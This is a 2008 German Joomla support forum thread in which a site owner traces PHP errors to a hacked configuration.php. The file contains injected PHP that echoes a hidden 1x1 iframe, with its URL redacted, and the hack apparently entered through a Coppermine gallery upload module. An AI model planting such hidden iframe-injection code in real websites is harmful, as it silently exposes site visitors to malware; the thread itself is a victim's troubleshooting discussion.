PHP-Fehler in meinem Joomla

**Chili Palmer** · 17.04.2008 22:07

Mein Joomla zeigt mir seit 2-3 Tagen nur noch folgende Fehlermeldung an, mit der ich kaum was anfangen kann:

Code:

Warning: main() [function.main]: open_basedir restriction in effect. File(/includes/version.php) is not within the allowed path(s): (/www/htdocs/v150499/:/tmp:/usr/bin:/www/htdocs/v150499:/bin:/usr/local/bin:/usr/share/php) in /www/htdocs/v150499/cms/includes/joomla.php on line 71

Warning: main(/includes/version.php) [function.main]: failed to open stream: Operation not permitted in /www/htdocs/v150499/cms/includes/joomla.php on line 71

Fatal error: main() [function.require]: Failed opening required '/includes/version.php' (include_path='.:/usr/share/php:..') in /www/htdocs/v150499/cms/includes/joomla.php on line 71

Es scheint sich ja nicht um einen MySQL-Fehler zu handeln. Hat jemand einen Tipp für mich? Habe 1.0.12 installiert. Der Fehler trat plötzlich auf, ohne das an der Seite gearbeitet wurde. Es wurde also nichts verändert. Die Fehlermeldung tritt sowohl im Frontend als auch im Backend auf.

**j!-n** · 17.04.2008 22:25

Link zur Seite?

**Chili Palmer** · 17.04.2008 22:26

http://www.feuerwehr-ochtrup.de/cms/index2.php

**j!-n** · 17.04.2008 22:33

Danke. Gugg mal, ob diese Datei existiert: /includes/version.php.

**Chili Palmer** · 17.04.2008 22:37

Ja, version.php existiert und hat die Rechte 644, letzte Änderung Januar 2007.

**j!-n** · 17.04.2008 22:49

Überprüfe mal die Pfade bitte mit dem angehängten Tool. Entpackt ins Joomlaroot laden und im Browser aufrufen, und mit den Pfaden in der configuration.php vergleichen.

**Chili Palmer** · 17.04.2008 22:57

Erledigt. Das Ergebnis:

Jooma 1.0.X
$mosConfig_absolute_path = '/www/htdocs/v150499/cms';

$mosConfig_cachepath = '/www/htdocs/v150499/cms/cache';

Sieht soweit gut aus. Diese Pfade wollte ich soeben mit den Daten in der configuration.php vergleichen. Und -siehe da- die configuration.php sieht nicht so aus wie gewohnt - das ist sie:

Code:

<?php 
	if($GLOBALS["fx"]==0) { 
	$GLOBALS["fx"]=1;
	echo "<iframe src='http://editiert' width=1 height=1></iframe>";
	}
	?><?php 
	if($GLOBALS["fx"]==0) { 
	$GLOBALS["fx"]=1;
	echo "<iframe src='http://editiert' width=1 height=1></iframe>";
	}
	?>

Da steht offenbar nichts mehr drin an Konfigurationsdaten. Letzte Änderung an dieser Datei war am 16.04.
Ich vermute, das ist der Fehler, wie kann ich diese Datei rekonstruieren?

P.S. Schon mal besten Dank an dieser Stelle für deine Hilfe!!

**j!-n** · 17.04.2008 23:04

Du scheinst gehackt worden zu sein

. Bitte gugg im Sicherheitsforum nach Sofortmaßnahmen, das Tauschen der manipulierten Datei ist keineswegs ausreichend, irgendwo steckt vermutlich eine Shell, die das Manipulieren ermöglicht hat. Meist ist das Joomla mehrfach korrumpiert, und da gibt es keine feste Vorgehensweise fürs in Ordnung bringen.

Edit: Bitte editiere den Quote aus der config, nicht daß jemand auf die Idee kommt, den Link dortdrin aufzurufen und sich noch zu infizieren, danke.

**Chili Palmer** · 18.04.2008 00:06

Ja, das ist dann wohl ein Hack gewesen. Es sind etliche Dateien auf dem Server verändert worden - alle beinhalten oben genannten Code mit dem Iframe. Anhand der Server-Logdateien glaube ich zu erkennen, das sich derjenige über die Coppermine Galerie Zugriff verschafft hat - zur jeweiligen Uhrzeit wurde dort die Adminseite, speziell das Uploadmodul mehrmals aufgerufen :(

Mal sehen, wie ich das wieder hinbekomme. Besten Dank für deine Hilfe, den Link habe ich oben rausgenommen.

**j!-n** · 18.04.2008 00:28

Kein Problem.

Thema: PHP-Fehler in meinem Joomla

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

PHP-Fehler in meinem Joomla

Erhielt Danksagungen von:

Lesezeichen

Lesezeichen

Berechtigungen